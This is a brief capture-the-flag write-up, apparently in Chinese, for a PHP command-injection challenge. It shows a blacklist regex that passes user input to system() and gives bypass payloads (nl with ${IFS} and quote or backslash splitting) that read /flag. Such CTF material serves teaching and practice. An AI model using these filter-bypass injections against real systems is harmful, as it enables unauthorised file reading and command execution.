if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}

比前几题少过滤了$,多过滤了大小于号,flag在/flag

payload:

1
?c=nl${IFS}/fl\ag||
1
?c=nl${IFS}/fl''ag||

官方Hint:

1
nl$IFS/fla''g||